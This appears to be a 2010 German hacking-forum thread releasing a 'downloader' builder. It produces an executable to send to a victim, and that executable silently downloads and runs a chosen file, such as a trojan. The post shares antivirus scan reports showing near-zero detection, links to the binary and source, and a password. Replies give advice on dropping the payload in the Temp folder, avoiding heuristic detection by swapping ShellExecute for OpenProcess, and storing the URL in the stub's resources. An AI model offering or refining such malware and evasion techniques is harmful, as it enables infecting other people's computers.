Hey Community,

Heute will ich mein erstes Tool public stellen. Es ist ein Downloader.

http://img198.imageshack.us/img198/7808/downloader.png

Viel ist nicht zu sagen. Den Gui habe ich in C++ programmiert und die Stub, die in den Resourcen eingehängt ist in C.

Hier noch der novirusthanks log:

Builder:

Report date: 2010-07-08 16:24:59 (GMT 1)
File name: Downloader_Builder_by_neite
File size: 200704 bytes
MD5 Hash: afe2cfb48671be7874afcba786c1d446
SHA1 Hash: 6f13524c26b818f8c931bcd16d3745fbc6ab813f
Detection rate: 0 on 16 (0%)
Status: CLEAN

Detections

a-squared -
Avast -
AVG -
Avira AntiVir -
BitDefender -
ClamAV -
Comodo -
Dr.Web -
F-PROT6 -
G-Data -
Ikarus T3 -
Kaspersky -
NOD32 -
Panda -
TrendMicro -
VBA32 -

Scan report generated by
NoVirusThanks.org (http://novirusthanks.org)


Stub:

File Info

Report date: 2010-07-08 16:27:53 (GMT 1)
File name: dw.exe
File size: 27122 bytes
MD5 Hash: 84e937b207f267212050525250ac33fc
SHA1 Hash: 051025ac198ef079524342067feb9ea172c0589d
Detection rate: 1 on 16 (6%)
Status: INFECTED

Detections

a-squared -
Avast -
AVG -
Avira AntiVir -
BitDefender -
ClamAV -
Comodo -
Dr.Web -
F-PROT6 -
G-Data -
Ikarus T3 -
Kaspersky -
NOD32 - NewHeur_PE virus
Panda -
TrendMicro -
VBA32 -

Scan report generated by
NoVirusThanks.org (http://novirusthanks.org)


Megaupload - Download ~Updated (http://www.megaupload.com/?d=XGYQWA4G)
Megaupload - SourceCode (http://www.megaupload.com/?d=W767LXKH)

Passwort: free-hack.com

Die herunter geladene Datei wird selbstverständlich automatisch ausgeführt.

MFG neitec

das Programm erstellt eine exe ie du jemanden schickst. Wenn er sie startet, wird ein download gestartet. Eben die URL die man da eingibt. Das könnte z.b. ein Trojaner sein

Wo läd er den Download hin? In das gleich Verzeichnis wo sich auch der Loader befindet?

Wo läd er den Download hin? In das gleich Verzeichnis wo sich auch der Loader befindet?

Ja... oder soll ich es ändern?

Nur Download und kein exec? Dann sollteste das auch noch ändern und den Pfad natürlich ;) Temp Ordner eignet sich für sowas immer xD

MfG

Nur Download und kein exec? Dann sollteste das auch noch ändern und den Pfad natürlich ;) Temp Ordner eignet sich für sowas immer xD

MfG


Doch, die Datei wird auch ausgeführt. Ich werde den Download Ordner auf das Temp Verzeicnis wechseln und einen neuen Link rein stellen

vll könntest du einbauen , dass man mehrere url hinzufügen kann und nicht nur eine^^
könntest du mal den source code veröffentlichen?^^

Sry ging leider nicht aus deiner Beschreibung hervor :D
Sourcecode fände ich auch interessant ;)

MfG

meinetwegen hier ist der Sourcecode:

Download (http://www.megaupload.com/?d=W767LXKH)

Aber bitte nicht schimpfen. Ich habe mir alles Kreuz und quer selber bei gebracht:D

Damned! Warum nutzt ihr immer das visual studio? wie wärs mal mit devcpp? Damit arbeite ich. Aber ansonsten ist das tool ziemlich gut, a es zwar genauso viel kann wie andere downloader, aber es gibt ein dickes plus weils in c geschrieben ist.

sieht soweit ganz gut aus, aber ein paar tipps hab ich noch für dich.
die #ifdef's können raus, die sind unnötig?!
Ansonsten würd ich die URL in die Resourcen der Stub schreiben. das geht mit ein paar wenigen API's (kannst ja mal bisschen rumprobieren, wenns nicht geht, kannste mir auch ne pm schicken).
Achja und statt shellexecute - openprocess. vlt bekommste dann die heuristik weg.

Gruß

zao

Ich finde nicht, dass die IFDEFs unnötig wären.. Beziehungsweise schadets niemandem, denn der Präprozessor schneidet den Codeteil ja sowieso raus?

Die API-Funktionen, von denen zao spricht, heißen:

BeginUpdateResource Function (Windows) (http://msdn.microsoft.com/en-us/library/ms648030%28v=VS.85%29.aspx)
UpdateResource Function (Windows) (http://msdn.microsoft.com/en-us/library/ms648049%28VS.85%29.aspx)
EndUpdateResource Function (Windows) (http://msdn.microsoft.com/en-us/library/ms648032%28v=VS.85%29.aspx)

Ansonsten sehr schön.

Gruß.

Vielen Dank für die Kommentare. Ich habe vor einiger Zeit schon Versucht die Resourcen von anderen 'executables' zu verändern. Vergebens:confused:...
Ich werde mich mit den Funktionen auseinander setzen.

Achja, die IFDEF's benutze ich zum ersten mal. Ich Hatte keine Lust die printf Funktionen für den Release zu entfernen.